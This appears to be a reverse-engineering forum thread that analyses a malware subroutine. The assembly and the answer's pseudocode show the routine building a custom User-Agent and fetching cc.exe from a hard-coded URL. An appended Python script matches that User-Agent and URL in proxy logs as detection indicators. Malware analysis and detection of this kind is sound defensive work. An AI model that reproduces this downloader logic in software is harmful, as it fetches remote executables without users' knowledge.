Reputation: 57
I'm trying to analyze malware in an executable. I'm trying to analyze the nature of the function at the subroutine sub_401040. When I ran it in IDA Pro, I got assembly code that looks something like the one that is posted below. However, I'm a bit confused about what exactly is happening in this function. Any help will be highly appreciated!
I can understand that subroutine 401040 has got a single parameter, but I'm lost trying to understand its functionality or how the parameter is being used.
sub_401040 proc near
Buffer= dword ptr -230h
var_22C= byte ptr -22Ch
hFile= dword ptr -30h
hInternet= dword ptr -2Ch
szAgent= byte ptr -28h
dwNumberOfBytesRead= dword ptr -8
var_4= dword ptr -4
arg_0= dword ptr 8
push ebp
mov ebp, esp
sub esp, 230h
mov eax, [ebp+arg_0]
push eax
push offset aInternetExplor ; "Internet Explorer 7.50/lol%d"
lea ecx, [ebp+szAgent]
push ecx ; char *
call _sprintf
add esp, 0Ch
push 0 ; dwFlags
push 0 ; lpszProxyBypass
push 0 ; lpszProxy
push 0 ; dwAccessType
lea edx, [ebp+szAgent]
push edx ; lpszAgent
call ds:InternetOpenA
mov [ebp+hInternet], eax
push 0 ; dwContext
push 0 ; dwFlags
push 0 ; dwHeadersLength
push 0 ; lpszHeaders
push offset szUrl ; "http://www.inactivedomain.com/cc.exe"
mov eax, [ebp+hInternet]
push eax ; hInternet
call ds:InternetOpenUrlA
mov [ebp+hFile], eax
cmp [ebp+hFile], 0
jnz short loc_4010B1
Upvotes: 0
Views: 259
Reputation: 426
Basically, it's doing this (pseudocode):
// arg0 is the function's single parameter (arg_0); it becomes the decimal suffix of the User-Agent string.
// szAgent is a fixed-size stack buffer (ebp-28h), so sprintf writes into the frame with no length limit.
sprintf(szAgent, "Internet Explorer 7.50/lol%d", arg0);
// http://msdn.microsoft.com/en-us/library/windows/desktop/aa385096(v=vs.85).aspx
// Initializes an application's use of the WinINet functions.
// Arguments, in the order the listing pushes them right-to-left: lpszAgent, dwAccessType, lpszProxy, lpszProxyBypass, dwFlags.
HINTERNET hInternet = InternetOpen(szAgent, 0, 0, 0, 0);
// http://msdn.microsoft.com/en-us/library/windows/desktop/aa385098(v=vs.85).aspx
// Opens a resource specified by a complete FTP or HTTP URL.
// Arguments: hInternet, lpszUrl (szUrl), lpszHeaders, dwHeadersLength, dwFlags, dwContext.
HINTERNET Return = InternetOpenUrl(hInternet, "http://www.inactivedomain.com/cc.exe", 0, 0, 0, 0);
// cmp [ebp+hFile], 0 / jnz loc_4010B1: the branch at loc_4010B1 is taken only when the handle is non-NULL.
if (!Return) // etc...
Upvotes: 1
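As an added example (not part of the question or the answer above), the sprintf format reconstructed here gives a very precise network fingerprint: a User-Agent of "Internet Explorer 7.50/lol" followed by the decimal value of the function's argument, and a hard-coded download URL. The script below scans proxy log lines for both indicators; the log format and all sample lines are constructed for this example, and the field layout (timestamp, client, method, URL, status, quoted User-Agent) is an assumption.

```python
import re

# Constructed sample proxy log lines for this example (not real traffic):
# timestamp, client IP, method, URL, HTTP status, quoted User-Agent.
SAMPLE_LOGS = [
    '2013-04-02T10:15:01Z 10.0.0.12 GET http://www.inactivedomain.com/cc.exe 200 "Internet Explorer 7.50/lol1234"',
    '2013-04-02T10:15:03Z 10.0.0.13 GET http://example.com/index.html 200 "Mozilla/5.0 (Windows NT 6.1) Firefox/20.0"',
    '2013-04-02T10:16:44Z 10.0.0.14 GET http://example.net/update.bin 200 "Internet Explorer 7.50/lol8"',
    '2013-04-02T10:17:00Z 10.0.0.15 GET http://example.org/ 404 "Internet Explorer 7.0"',
    'this line is not in the expected format',
]

# sprintf(szAgent, "Internet Explorer 7.50/lol%d", arg0) yields exactly this shape:
# a fixed prefix followed by the decimal value of the function's single argument.
UA_PATTERN = re.compile(r'^Internet Explorer 7\.50/lol(-?\d+)$')

# URL hard-coded in the sample (szUrl); a hit on it is a second, independent indicator.
KNOWN_URL = 'http://www.inactivedomain.com/cc.exe'

# Assumed log layout for this example.
LOG_PATTERN = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>\S+) (?P<url>\S+) (?P<status>\d+) "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Return the fields of one log line, or None if it does not match the assumed format."""
    m = LOG_PATTERN.match(line)
    return m.groupdict() if m else None


def scan(lines):
    """Return one finding per line whose User-Agent or URL matches the sample's fingerprint."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # malformed lines are skipped, not treated as evidence
        ua = UA_PATTERN.match(rec['ua'])
        reasons = []
        if ua:
            reasons.append('user-agent')
        if rec['url'] == KNOWN_URL:
            reasons.append('url')
        if reasons:
            findings.append({
                'ts': rec['ts'], 'src': rec['src'], 'url': rec['url'],
                'suffix': int(ua.group(1)) if ua else None,  # the %d value, i.e. arg0
                'reasons': reasons,
            })
    return findings


if __name__ == '__main__':
    for finding in scan(SAMPLE_LOGS):
        print(finding)
```

The recorded suffix is the value the sample passed as arg0, which lets separate infections be correlated across hosts that share the same User-Agent prefix.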